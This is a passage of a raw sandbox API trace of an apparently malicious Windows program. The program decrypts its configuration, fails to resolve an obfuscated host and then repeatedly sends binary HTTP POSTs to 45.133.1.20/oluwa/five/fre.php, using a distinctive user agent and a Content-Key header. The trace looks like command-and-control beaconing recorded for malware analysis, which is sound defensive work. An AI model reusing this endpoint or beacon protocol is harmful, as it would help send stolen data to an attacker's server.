(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.725] GetProcessHeap () returned 0x6a0000 [0296.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0296.725] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.725] GetProcessHeap () returned 0x6a0000 [0296.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0296.726] GetProcessHeap () returned 0x6a0000 [0296.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.726] GetProcessHeap () returned 0x6a0000 [0296.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0296.726] GetProcessHeap () returned 0x6a0000 [0296.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0296.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.728] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.734] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0296.741] GetProcessHeap () returned 0x6a0000 [0296.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.744] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0296.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.746] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.747] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.747] GetProcessHeap () returned 0x6a0000 [0296.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.748] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0296.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.749] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0296.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.751] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0296.751] GetProcessHeap () returned 0x6a0000 [0296.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.752] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0296.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.755] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0296.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.757] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0296.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.759] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0296.759] GetProcessHeap () returned 0x6a0000 [0296.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0296.759] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0296.759] GetProcessHeap () returned 0x6a0000 [0296.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0296.759] socket (af=2, type=1, protocol=6) returned 0xb20 [0296.759] connect (s=0xb20, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0296.787] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0296.787] GetProcessHeap () returned 0x6a0000 [0296.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0296.787] GetProcessHeap () returned 0x6a0000 [0296.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0296.788] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.789] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.789] GetProcessHeap () returned 0x6a0000 [0296.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db0c8 [0296.789] GetProcessHeap () returned 0x6a0000 [0296.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.790] GetProcessHeap () returned 0x6a0000 [0296.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0296.790] GetProcessHeap () returned 0x6a0000 [0296.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0296.796] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.800] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.800] GetProcessHeap () returned 0x6a0000 [0296.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0296.800] GetProcessHeap () returned 0x6a0000 [0296.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.801] send (s=0xb20, buf=0x6bd460*, len=242, flags=0) returned 242 [0296.802] send (s=0xb20, buf=0x6bb998*, len=159, flags=0) returned 159 [0296.802] GetProcessHeap () returned 0x6a0000 [0296.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0296.802] recv (in: s=0xb20, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0296.878] GetProcessHeap () returned 0x6a0000 [0296.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0296.879] GetProcessHeap () returned 0x6a0000 [0296.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0296.879] GetProcessHeap () returned 0x6a0000 [0296.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db0c8 | out: hHeap=0x6a0000) returned 1 [0296.879] GetProcessHeap () returned 0x6a0000 [0296.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0296.879] closesocket (s=0xb20) returned 0 [0296.880] GetProcessHeap () returned 0x6a0000 [0296.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0296.880] GetProcessHeap () returned 0x6a0000 [0296.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.880] GetProcessHeap () returned 0x6a0000 [0296.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0296.881] GetProcessHeap () returned 0x6a0000 [0296.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0296.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1848) returned 0xb20 [0296.883] Sleep (dwMilliseconds=0xea60) [0296.890] GetProcessHeap () returned 0x6a0000 [0296.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0296.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.891] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.899] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0296.906] GetProcessHeap () returned 0x6a0000 [0296.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.909] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0296.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.910] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.911] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.911] GetProcessHeap () returned 0x6a0000 [0296.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.922] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0296.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.923] CryptDestroyKey (hKey=0x6ad020) returned 1 [0296.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.924] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0296.924] GetProcessHeap () returned 0x6a0000 [0296.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.925] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.926] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.927] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.928] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.928] GetProcessHeap () returned 0x6a0000 [0296.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0296.930] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.930] GetProcessHeap () returned 0x6a0000 [0296.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0296.931] GetProcessHeap () returned 0x6a0000 [0296.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.932] GetProcessHeap () returned 0x6a0000 [0296.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0296.932] GetProcessHeap () returned 0x6a0000 [0296.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0296.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.933] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.939] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0296.945] GetProcessHeap () returned 0x6a0000 [0296.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.947] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0296.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.948] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.949] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.949] GetProcessHeap () returned 0x6a0000 [0296.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.956] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0296.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.958] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0296.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.960] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0296.960] GetProcessHeap () returned 0x6a0000 [0296.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.964] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0296.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.965] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0296.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.967] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0296.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.968] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0296.968] GetProcessHeap () returned 0x6a0000 [0296.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0296.969] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0296.969] GetProcessHeap () returned 0x6a0000 [0296.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0296.969] socket (af=2, type=1, protocol=6) returned 0xb24 [0296.969] connect (s=0xb24, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0296.998] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0296.998] GetProcessHeap () returned 0x6a0000 [0296.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0296.998] GetProcessHeap () returned 0x6a0000 [0296.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0296.999] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.000] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.000] GetProcessHeap () returned 0x6a0000 [0297.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dad08 [0297.000] GetProcessHeap () returned 0x6a0000 [0297.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.001] GetProcessHeap () returned 0x6a0000 [0297.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0297.001] GetProcessHeap () returned 0x6a0000 [0297.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0297.002] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.003] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.003] GetProcessHeap () returned 0x6a0000 [0297.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0297.003] GetProcessHeap () returned 0x6a0000 [0297.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.004] send (s=0xb24, buf=0x6bd460*, len=242, flags=0) returned 242 [0297.005] send (s=0xb24, buf=0x6bb998*, len=159, flags=0) returned 159 [0297.005] GetProcessHeap () returned 0x6a0000 [0297.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0297.007] recv (in: s=0xb24, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0297.080] GetProcessHeap () returned 0x6a0000 [0297.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0297.081] GetProcessHeap () returned 0x6a0000 [0297.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0297.083] GetProcessHeap () returned 0x6a0000 [0297.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dad08 | out: hHeap=0x6a0000) returned 1 [0297.084] GetProcessHeap () returned 0x6a0000 [0297.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0297.084] closesocket (s=0xb24) returned 0 [0297.085] GetProcessHeap () returned 0x6a0000 [0297.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0297.085] GetProcessHeap () returned 0x6a0000 [0297.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.085] GetProcessHeap () returned 0x6a0000 [0297.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0297.087] GetProcessHeap () returned 0x6a0000 [0297.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0297.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x184c) returned 0xb24 [0297.090] Sleep (dwMilliseconds=0xea60) [0297.102] GetProcessHeap () returned 0x6a0000 [0297.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0297.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.104] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0297.125] GetProcessHeap () returned 0x6a0000 [0297.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0297.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.127] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0297.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.128] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.129] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.129] GetProcessHeap () returned 0x6a0000 [0297.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0297.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.131] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0297.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.132] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0297.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.133] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0297.133] GetProcessHeap () returned 0x6a0000 [0297.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.134] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.135] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.137] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.138] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.138] GetProcessHeap () returned 0x6a0000 [0297.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0297.138] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.138] GetProcessHeap () returned 0x6a0000 [0297.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: 